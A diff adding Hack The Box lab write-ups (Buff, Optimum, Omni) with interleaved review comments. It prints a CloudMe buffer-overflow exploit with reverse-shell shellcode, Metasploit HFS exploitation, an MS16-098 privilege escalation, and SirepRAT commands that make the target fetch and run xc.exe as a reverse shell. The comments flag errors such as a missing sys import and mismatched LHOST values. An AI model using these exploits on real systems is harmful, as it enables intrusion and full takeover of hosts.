+ x86/shikata_ga_nai succeeded with size 351 (iteration=0)
+ x86/shikata_ga_nai chosen with final size 351
+ Payload size: 351 bytes
+ Final size of python file: 1869 bytes
+ payload = b""
+ payload += b"\xba\xcc\x93\xd2\xd9\xdb\xc8\xd9\x74\x24\xf4\x58"
+ payload += b"\x2b\xc9\xb1\x52\x31\x50\x12\x03\x50\x12\x83\x0c"
+ payload += b"\x97\x30\x2c\x70\x70\x36\xcf\x88\x81\x57\x59\x6d"
+ payload += b"\xb0\x57\x3d\xe6\xe3\x67\x35\xaa\x0f\x03\x1b\x5e"
+ payload += b"\x9b\x61\xb4\x51\x2c\xcf\xe2\x5c\xad\x7c\xd6\xff"
+ payload += b"\x2d\x7f\x0b\xdf\x0c\xb0\x5e\x1e\x48\xad\x93\x72"
+ payload += b"\x01\xb9\x06\x62\x26\xf7\x9a\x09\x74\x19\x9b\xee"
+ payload += b"\xcd\x18\x8a\xa1\x46\x43\x0c\x40\x8a\xff\x05\x5a"
+ payload += b"\xcf\x3a\xdf\xd1\x3b\xb0\xde\x33\x72\x39\x4c\x7a"
+ payload += b"\xba\xc8\x8c\xbb\x7d\x33\xfb\xb5\x7d\xce\xfc\x02"
+ payload += b"\xff\x14\x88\x90\xa7\xdf\x2a\x7c\x59\x33\xac\xf7"
+ payload += b"\x55\xf8\xba\x5f\x7a\xff\x6f\xd4\x86\x74\x8e\x3a"
+ payload += b"\x0f\xce\xb5\x9e\x4b\x94\xd4\x87\x31\x7b\xe8\xd7"
+ payload += b"\x99\x24\x4c\x9c\x34\x30\xfd\xff\x50\xf5\xcc\xff"
+ payload += b"\xa0\x91\x47\x8c\x92\x3e\xfc\x1a\x9f\xb7\xda\xdd"
+ payload += b"\xe0\xed\x9b\x71\x1f\x0e\xdc\x58\xe4\x5a\x8c\xf2"
+ payload += b"\xcd\xe2\x47\x02\xf1\x36\xc7\x52\x5d\xe9\xa8\x02"
+ payload += b"\x1d\x59\x41\x48\x92\x86\x71\x73\x78\xaf\x18\x8e"
+ payload += b"\xeb\xda\xd6\x9e\xe6\xb2\xe4\x9e\xf9\xf9\x60\x78"
+ payload += b"\x93\xed\x24\xd3\x0c\x97\x6c\xaf\xad\x58\xbb\xca"
+ payload += b"\xee\xd3\x48\x2b\xa0\x13\x24\x3f\x55\xd4\x73\x1d"
+ payload += b"\xf0\xeb\xa9\x09\x9e\x7e\x36\xc9\xe9\x62\xe1\x9e"
+ payload += b"\xbe\x55\xf8\x4a\x53\xcf\x52\x68\xae\x89\x9d\x28"
+ payload += b"\x75\x6a\x23\xb1\xf8\xd6\x07\xa1\xc4\xd7\x03\x95"
+ payload += b"\x98\x81\xdd\x43\x5f\x78\xac\x3d\x09\xd7\x66\xa9"
+ payload += b"\xcc\x1b\xb9\xaf\xd0\x71\x4f\x4f\x60\x2c\x16\x70"
+ payload += b"\x4d\xb8\x9e\x09\xb3\x58\x60\xc0\x77\x68\x2b\x48"
+ payload += b"\xd1\xe1\xf2\x19\x63\x6c\x05\xf4\xa0\x89\x86\xfc"
+ payload += b"\x58\x6e\x96\x75\x5c\x2a\x10\x66\x2c\x23\xf5\x88"
+ payload += b"\x83\x44\xdc"
+
+
+
+Which gives us the following exploit:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → cat exploit.py
+ # Exploit Title: CloudMe 1.11.2 - Buffer Overflow (PoC)
+ # Date: 2020-04-27
+ # Exploit Author: Andy Bowden
+ # Vendor Homepage: https://www.cloudme.com/en
+ # Software Link: https://www.cloudme.com/downloads/CloudMe_1112.exe
+ # Version: CloudMe 1.11.2
+ # Tested on: Windows 10 x86
+
+ #Instructions:
+ # Start the CloudMe service and run the script.
+
+ import socket
+
+ target = "127.0.0.1"
+
+ padding1 = b"\x90" * 1052
+ EIP = b"\xB5\x42\xA8\x68" # 0x68A842B5 -> PUSH ESP, RET
+ NOPS = b"\x90" * 30
+
+ #NOT msfvenom -a x86 -p windows/exec CMD=calc.exe -b '\x00\x0A\x0D' -f python
+ # msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.13 LPORT=443 -b '\x00\x0A\x0D' -f python -v payload
+ payload = b""
+ payload += b"\xba\xcc\x93\xd2\xd9\xdb\xc8\xd9\x74\x24\xf4\x58"
+ payload += b"\x2b\xc9\xb1\x52\x31\x50\x12\x03\x50\x12\x83\x0c"
+ payload += b"\x97\x30\x2c\x70\x70\x36\xcf\x88\x81\x57\x59\x6d"
+ payload += b"\xb0\x57\x3d\xe6\xe3\x67\x35\xaa\x0f\x03\x1b\x5e"
+ payload += b"\x9b\x61\xb4\x51\x2c\xcf\xe2\x5c\xad\x7c\xd6\xff"
+ payload += b"\x2d\x7f\x0b\xdf\x0c\xb0\x5e\x1e\x48\xad\x93\x72"
+ payload += b"\x01\xb9\x06\x62\x26\xf7\x9a\x09\x74\x19\x9b\xee"
+ payload += b"\xcd\x18\x8a\xa1\x46\x43\x0c\x40\x8a\xff\x05\x5a"
+ payload += b"\xcf\x3a\xdf\xd1\x3b\xb0\xde\x33\x72\x39\x4c\x7a"
+ payload += b"\xba\xc8\x8c\xbb\x7d\x33\xfb\xb5\x7d\xce\xfc\x02"
+ payload += b"\xff\x14\x88\x90\xa7\xdf\x2a\x7c\x59\x33\xac\xf7"
+ payload += b"\x55\xf8\xba\x5f\x7a\xff\x6f\xd4\x86\x74\x8e\x3a"
+ payload += b"\x0f\xce\xb5\x9e\x4b\x94\xd4\x87\x31\x7b\xe8\xd7"
+ payload += b"\x99\x24\x4c\x9c\x34\x30\xfd\xff\x50\xf5\xcc\xff"
+ payload += b"\xa0\x91\x47\x8c\x92\x3e\xfc\x1a\x9f\xb7\xda\xdd"
+ payload += b"\xe0\xed\x9b\x71\x1f\x0e\xdc\x58\xe4\x5a\x8c\xf2"
+ payload += b"\xcd\xe2\x47\x02\xf1\x36\xc7\x52\x5d\xe9\xa8\x02"
+ payload += b"\x1d\x59\x41\x48\x92\x86\x71\x73\x78\xaf\x18\x8e"
+ payload += b"\xeb\xda\xd6\x9e\xe6\xb2\xe4\x9e\xf9\xf9\x60\x78"
+ payload += b"\x93\xed\x24\xd3\x0c\x97\x6c\xaf\xad\x58\xbb\xca"
+ payload += b"\xee\xd3\x48\x2b\xa0\x13\x24\x3f\x55\xd4\x73\x1d"
+ payload += b"\xf0\xeb\xa9\x09\x9e\x7e\x36\xc9\xe9\x62\xe1\x9e"
+ payload += b"\xbe\x55\xf8\x4a\x53\xcf\x52\x68\xae\x89\x9d\x28"
+ payload += b"\x75\x6a\x23\xb1\xf8\xd6\x07\xa1\xc4\xd7\x03\x95"
+ payload += b"\x98\x81\xdd\x43\x5f\x78\xac\x3d\x09\xd7\x66\xa9"
+ payload += b"\xcc\x1b\xb9\xaf\xd0\x71\x4f\x4f\x60\x2c\x16\x70"
+ payload += b"\x4d\xb8\x9e\x09\xb3\x58\x60\xc0\x77\x68\x2b\x48"
+ payload += b"\xd1\xe1\xf2\x19\x63\x6c\x05\xf4\xa0\x89\x86\xfc"
+ payload += b"\x58\x6e\x96\x75\x5c\x2a\x10\x66\x2c\x23\xf5\x88"
+ payload += b"\x83\x44\xdc"
+
+ overrun = b"C" * (1500 - len(padding1 + NOPS + EIP + payload))
+
+ buff = padding1 + EIP + NOPS + payload + overrun
+
+ try:
+ s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ s.connect((target,8888))
+ s.send(buff)
+ except Exception as e:
+ print(sys.exc_value)
+
+
+
+So let's run it:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/78 ] [~/HTB/Buff]
+ → python3 exploit.py
+
+
+
+And we catch the reverse shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/79 ] [~/HTB/Buff]
+ → nc -lvnp 443
+ listening on [any] 443 ...
+ connect to [10.10.14.13] from (UNKNOWN) [10.10.10.198] 50000
+ Microsoft Windows [Version 10.0.17134.1610]
+ (c) 2018 Microsoft Corporation. All rights reserved.
+
+ C:\Windows\system32>whoami
+ whoami
+ buff\administrator
+
+ C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
+ type C:\Users\Administrator\Desktop\root.txt
+ 4bXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! We managed to get a reverse shell as root and get the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
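Review bot: the error handler at the bottom of exploit.py (`except Exception as e:` / `print(sys.exc_value)`) will itself blow up under the `python3 exploit.py` invocation shown a few lines later: `sys` is never imported and `sys.exc_value` does not exist in Python 3, so a failed connection is masked by a NameError instead of being reported. Replace it with `print(e)` and close the socket after `send`. Documentation points in the same hunk: the mysql step claims login "without any password" while the transcript shows `-p` and an `Enter password:` prompt, so state which it was; the closing sentence says "as root" while `whoami` returns `buff\administrator`; and the Conclusion promises a progress graph but no image follows the heading.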
diff --git a/Easy/5.md b/Easy/5.md
new file mode 100644
index 0000000..9764bb5
--- /dev/null
+++ b/Easy/5.md
@@ -0,0 +1,214 @@
+# Optimum Writeup
+
+
+
+## Introduction :
+
+Optimum was an easy Windows box released back in March 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ **λ nihilist [nihilist/_HTB/Optimum] → nmap -sC -sV 10.10.10.8**
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-10 14:48 CET
+ Nmap scan report for 10.10.10.8
+ Host is up (0.037s latency).
+ Not shown: 999 filtered ports
+ PORT STATE SERVICE VERSION
+ 80/tcp open http HttpFileServer httpd 2.3
+ |_http-server-header: HFS 2.3
+ |_http-title: HFS /
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 13.49 seconds
+
+
+Browsing to http://10.10.10.8/ gives us the main page of rejetto's HttpFileServer 2.3 service as planned.
+
+
+
+## **Part 2 : Getting User Access**
+
+Let's use the **nikto** command to enumerate potential vulnerabilities on the Http service.
+
+
+ **λ root [nihilist/_HTB/Optimum] → nikto -h http://10.10.10.8/**
+ - Nikto v2.1.6
+ ---------------------------------------------------------------------------
+ + Target IP: 10.10.10.8
+ + Target Hostname: 10.10.10.8
+ + Target Port: 80
+ + Start Time: 2019-11-10 15:02:06 (GMT1)
+ ---------------------------------------------------------------------------
+ + Server: HFS 2.3
+ + Cookie HFS_SID created without the httponly flag
+ + The anti-clickjacking X-Frame-Options header is not present.
+ + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ + No CGI Directories found (use '-C all' to force check all possible dirs)
+ + ERROR: Error limit (20) reached for host, giving up. Last error:
+ + Scan terminated: 0 error(s) and 4 item(s) reported on remote host
+ + End Time: 2019-11-10 15:02:50 (GMT1) (44 seconds)
+ ---------------------------------------------------------------------------
+ + 1 host(s) tested
+
+
+Let's use the **searchsploit** command to see which exploits are publicly available for rejetto's HttpFileServer service.
+
+
+ **λ root [nihilist/_HTB/Optimum] → searchsploit rejetto**
+ --------------------------------------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ --------------------------------------------------------------------------- ----------------------------------------
+ Rejetto HTTP File Server (HFS) - Remote Command Execution (Metasploit) | exploits/windows/remote/34926.rb
+ Rejetto HTTP File Server (HFS) 1.5/2.x - Multiple Vulnerabilities | exploits/windows/remote/31056.py
+ Rejetto HTTP File Server (HFS) 2.2/2.3 - Arbitrary File Upload | exploits/multiple/remote/30850.txt
+ Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (1) | exploits/windows/remote/34668.txt
+ Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) | exploits/windows/remote/39161.py
+ Rejetto HTTP File Server (HFS) 2.3a/2.3b/2.3c - Remote Command Execution | exploits/windows/webapps/34852.txt
+ --------------------------------------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+
+
+
+it seems that there are Remote Command Execution Vulnerabilities. We will use a metasploit module to exploit the target.
+
+
+ **msf5 > search rejetto**
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
+
+
+ **msf5 > use exploit/windows/http/rejetto_hfs_exec**
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOST 10.10.10.8**
+ RHOST => 10.10.10.8
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set RPORT 80**
+ RPORT => 80
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVHOST 10.10.14.48**
+ SRVHOST => 10.10.14.48
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set SRVPORT 9001**
+ SRVPORT => 9001
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.15.150**
+ LHOST => 10.10.15.150
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set LPORT 9002**
+ LPORT => 9002
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > set PAYLOAD windows/x64/meterpreter/reverse_tcpset**
+
+ **msf5 exploit(windows/http/rejetto_hfs_exec) > exploit**
+
+ [*] Started reverse TCP handler on 10.10.14.48:9002
+ [*] Using URL: http://10.10.14.48:9001/7WzzcN0iSur
+ [*] Server started.
+ [*] Sending a malicious request to /
+ [*] Payload request received: /7WzzcN0iSur
+ [*] Sending stage (180291 bytes) to 10.10.10.8
+ [*] Meterpreter session 1 opened (10.10.14.48:9002 -> 10.10.10.8:49184) at 2019-11-10 15:27:23 +0100
+ [!] Tried to delete %TEMP%\XAzNIKQmr.vbs, unknown result
+ [*] Server stopped.
+
+ **meterpreter > sysinfo**
+ Computer : OPTIMUM
+ OS : Windows 2012 R2 (6.3 Build 9600).
+ Architecture : x64
+ System Language : el_GR
+ Domain : HTB
+ Logged On Users : 1
+ Meterpreter : x86/windows
+
+ **meterpreter > shell**
+ Process 1992 created.
+ Channel 2 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>whoami**
+ whoami
+ optimum\kostas
+
+
+
+Meterpreter Returned ! we are now logged on as kostas into a low-privilege shell.
+
+## **Part 3 : Getting Root Access**
+
+Now we need to use the exploit n°41020 taking advantage of RGNOBJ's Integer OVerflow on Windows 8.1 (MS16-098) We will download 41020.exe from exploit-db's collection of binary exploits available on github.
+
+_Terminal n°1:_
+
+
+ **wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe**
+
+ --2019-11-10 15:37:28-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/41020.exe
+ Loaded CA certificate '/etc/ssl/certs/ca-certificates.crt'
+ Resolving github.com (github.com)... 140.82.118.3
+ Connecting to github.com (github.com)|140.82.118.3|:443... connected.
+ HTTP request sent, awaiting response... 302 Found
+ Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe [following]
+ --2019-11-10 15:37:28-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/41020.exe
+ Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.120.133
+ Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.120.133|:443... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 560128 (547K) [application/octet-stream]
+ Saving to: ‘41020.exe’
+
+ 41020.exe 100%[==============================================>] 547.00K 840KB/s in 0.7s
+
+ 2019-11-10 15:37:30 (840 KB/s) - ‘41020.exe’ saved [560128/560128]
+
+
+We downloaded the binary, now let's upload it to the server using metasploit, and execute it to attempt getting an elevated privilege shell.
+
+_Terminal n°2:_
+
+
+ **meterpreter > upload 41020.exe**
+ [*] uploading : 41020.exe -> 41020.exe
+ [*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): 41020.exe -> 41020.exe
+ [*] uploaded : 41020.exe -> 41020.exe
+ meterpreter > shell
+ Process 900 created.
+ Channel 4 created.
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>41020.exe**
+ 41020.exe
+ Microsoft Windows [Version 6.3.9600]
+ (c) 2013 Microsoft Corporation. All rights reserved.
+
+ **C:\Users\kostas\Desktop>whoami**
+ whoami
+ nt authority\system
+
+
+The privilege escalation was successful ! Now all that's left to do is collecting the user and root flags.
+
+
+ **C:\Users\kostas\Desktop>cd ..\..\..**
+
+ **C:\>more C:\Users\kostas\Desktop\user.txt.txt**
+ more C:\Users\kostas\Desktop\user.txt.txt
+ d0XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+ **C:\>more C:\Users\Administrator\Desktop\root.txt**
+ more C:\Users\Administrator\Desktop\root.txt
+ 51XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
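Review bot: the payload line `set PAYLOAD windows/x64/meterpreter/reverse_tcpset` has `set` fused onto the module name, which msfconsole rejects as an invalid payload, and the rest of the transcript is consistent with the payload never having changed: `sysinfo` reports `Meterpreter : x86/windows`, not x64. The handler output also contradicts the options set directly above it (`LHOST => 10.10.15.150` but `Started reverse TCP handler on 10.10.14.48:9002`), so either correct the option lines or re-capture the session. Minor: "OVerflow" in the Part 3 intro, and the Conclusion heading is followed by no progress-graph image.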
diff --git a/Easy/50.md b/Easy/50.md
new file mode 100644
index 0000000..e8129a5
--- /dev/null
+++ b/Easy/50.md
@@ -0,0 +1,540 @@
+# Omni Writeup
+
+
+
+## Introduction :
+
+Omni is an Easy box released back in August 2020, it features a Windows IOT Core which can run on raspberry pis.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → nmap -vvv -p- 10.10.10.204 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered
+ Discovered open port 8080/tcp on 10.10.10.204
+ Discovered open port 135/tcp on 10.10.10.204
+ Discovered open port 29817/tcp on 10.10.10.204
+ Discovered open port 29820/tcp on 10.10.10.204
+ Discovered open port 5985/tcp on 10.10.10.204
+ Discovered open port 29819/tcp on 10.10.10.204
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → nmap -sCV -p 135,8008,5985,29817,29820,29819 10.10.10.204 -Pn
+ Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
+ Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 16:51 CEST
+ Nmap scan report for 10.10.10.204
+ Host is up (0.039s latency).
+
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 5985/tcp open upnp Microsoft IIS httpd
+ 8008/tcp filtered http
+ 29817/tcp open unknown
+ 29819/tcp open arcserve ARCserve Discovery
+ 29820/tcp open unknown
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port29820-TCP:V=7.91%I=7%D=6/2%Time=60B79B09%P=x86_64-pc-linux-gnu%r(NU
+ SF:LL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,"\
+ SF:*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04
+ SF:G\xa9m\x1c\xc9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
+ SF:9}\xc8O\x12");
+ Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 74.02 seconds
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 8080, so let's investigate it:
+
+
+
+We don't have credentials yet, so let's try to spawn a null session on the RPC port:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Omni]
+ → rpcclient -U "" -N 10.10.10.204
+ Cannot connect to server. Error was NT_STATUS_IO_TIMEOUT
+
+
+
+No luck either, all that's left is the other 298XX ports, but we barely have any info on those. Although we know that this is windows from the port scanning, let's search what the ports may be about with what we know:
+
+
+
+And now we're onto something! This may be a Windows IOT machine, and the [presentation](https://woprsummit.org/slides-archive/SirepRAT_RCEasSYSTEMonWindowsIoTCore-WOPRSummit.pdf)that was presented in 2019 goes into how the Sirep protocol works, which also shows how it provides a remote unauthenticated execution of SYSTEM on windows IOT hosts.
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 GetSystemInformationFromDevice
+ <****SystemInformationResult | type: 51, payload length: 32, kv: {'dwOSVersionInfoSize': 0, 'dwMajorVersion': 10, 'dwMinorVersion': 0, 'dwBuildNumber': 17763, 'dwPlatformId': 2, 'szCSDVersion': 0, 'wServicePackMajor': 1, 'wServicePackMinor': 2, 'wSuiteMask': 0, 'wProductType': 0, 'wReserved': 0}>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "\c dir -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 125, payload peek: 'b'Microsoft Windows [Version 10.0.17763.107]\r\nCopyri''>
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "\c whoami -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 125, payload peek: 'b'Microsoft Windows [Version 10.0.17763.107]\r\nCopyri''>
+
+Very weird box, we can't even use the whoami command, but let's try to get nc.exe onto the box, we're going to get [xc.exe](../Tools/xc.html) instead:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → locate xc.exe
+ /home/nothing/HTB/Servmon/xc/xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc.exe .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+Then we make the box download it using SirepRAT.py:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9009
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 17:31:18 Listening on :9009
+ 2021/06/02 17:31:18 Waiting for connections...
+
+
+ [term2]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → locate xc.exe
+ /home/nothing/HTB/Servmon/xc/xc.exe
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → cp /home/nothing/HTB/Servmon/xc/xc.exe .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+
+ [term3]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-Webrequest -OutFile C:\\Windows\\System32\\spool\\drivers\\color\\xc.exe -Uri http://10.10.14.13:9090/xc.exe" --v
+ ---------
+
+ --------- <****HResultResult | type: 1, payload length: 4, HResult: 0x0>
+
+Now that the xc.exe binary got downloaded by the box, we're going to use it to get the reverse shell:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c C:\\Windows\\System32\\spool\\drivers\\color\\xc.exe 10.10.14.13 9009 -e powershell.exe" --v
+ ---------
+
+ ---------
+ ---------
+ 2021/06/02 15:42:11 Connected to 10.10.14.13:9009
+
+ ---------
+ <****HResultResult | type: 1, payload length: 4, HResult: 0x0> <****OutputStreamResult | type: 11, payload length: 50, payload peek: 'b'2021/06/02 15:42:11 Connected to 10.10.14.13:9009\n''>
+
+And we catched the reverse xc shell connection:
+
+
+ [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Omni/SirepRAT]
+ → ./xc -l -p 9009
+
+ __ _____
+ \ \/ / __|
+ > <****(__
+ /_/\_\___| by @xct_de
+ build: QUnVVFdLYEkibcKx
+
+ 2021/06/02 17:31:18 Listening on :9009
+ 2021/06/02 17:31:18 Waiting for connections...
+ 2021/06/02 17:34:39 Connection from 10.10.10.204:49670
+ 2021/06/02 17:34:39 Stream established
+
+ [*] Auto-Plugins:
+ [xc: C:\windows\system32]: !shell
+ Microsoft Windows [Version 10.0.17763.107]
+ Copyright (c) Microsoft Corporation. All rights reserved.
+
+ C:\windows\system32>whoami
+ whoami
+ 'whoami' is not recognized as an internal or external command,
+ operable program or batch file.
+
+Here you see we really cannot use the whoami command, instead we're going to get the value of the **$env:UserName** powershell variable:
+
+
+ C:\windows\system32>powershell
+ powershell
+ Windows PowerShell
+ Copyright (C) Microsoft Corporation. All rights reserved.
+
+
+ PS C:\windows\system32> $env:UserName
+ $env:UserName
+ omni$
+
+
+
+the omni user does not have access to neither user.txt nor to root.txt, so let's enumerate the box for potential privesc paths with winPEAS:
+
+
+ PS C:\windows\system32> cd C:\
+ cd C:\
+ PS C:\> dir
+ dir
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 7/20/2020 2:36 AM $Reconfig$
+ d----l 10/26/2018 11:35 PM Data
+ d----- 10/26/2018 11:37 PM Program Files
+ d----- 10/26/2018 11:38 PM PROGRAMS
+ d----- 10/26/2018 11:37 PM SystemData
+ d-r--- 10/26/2018 11:37 PM Users
+ d----- 7/3/2020 10:35 PM Windows
+
+
+ PS C:\> mkdir Temp
+ mkdir Temp
+
+
+ Directory: C:\
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ d----- 6/2/2021 3:45 PM Temp
+
+
+ PS C:\> cd Temp
+ cd Temp
+ PS C:\Temp>
+
+
+We're going to upload our script in a temporary directory we created:
+
+
+ [term1]
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → locate winPEAS.ps1
+ /usr/share/powershell-empire/data/module_source/privesc/Invoke-winPEAS.ps1
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → cp $(locate winPEAS.ps1) .
+
+ [ 10.10.14.13/23 ] [ /dev/pts/75 ] [HTB/Omni/SirepRAT]
+ → python3 -m http.server 9090
+ Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ...
+
+ [term2]
+
+ PS C:\Temp> Invoke-WebRequest -uri "http://10.10.14.13:9090/Invoke-winPEAS.ps1" -o "peas.ps1"
+ Invoke-WebRequest -uri "http://10.10.14.13:9090/Invoke-winPEAS.ps1" -o "peas.ps1"
+
+ PS C:\Temp> ls
+ ls
+
+
+ Directory: C:\Temp
+
+
+ Mode LastWriteTime Length Name
+ ---- ------------- ------ ----
+ -a---- 6/2/2021 3:56 PM 233056 peas.ps1
+
+ PS C:\Temp> import-module ./peas.ps1
+ import-module ./peas.ps1
+
+ PS C:\Temp> Invoke-winPEAS
+
+ PS C:\Temp> import-module .\peas.ps1
+ import-module .\peas.ps1
+
+ PS C:\Temp> Invoke-winPEAS
+ Invoke-winPEAS
+ Unable to find type [w1nP34S.Program].
+ At C:\Temp\peas.ps1:20 char:5
+ + [w1nP34S.Program]::Main($Command.Split(" "))
+ + ~~~~~~~~~~~~~~~~~
+ + CategoryInfo : InvalidOperation: (w1nP34S.Program:TypeName) [],
+ RuntimeException
+ + FullyQualifiedErrorId : TypeNotFound
+
+
+
+Yeah right, that box is quite a mess so let's manually enumerate:
+
+
+ PS C:\Program Files\WindowsPowerShell\Modules\PackageManagement> ls
+ ls
+
+
+ Directory: C:\Program Files\WindowsPowerShell\Modules\PackageManagement
+
+
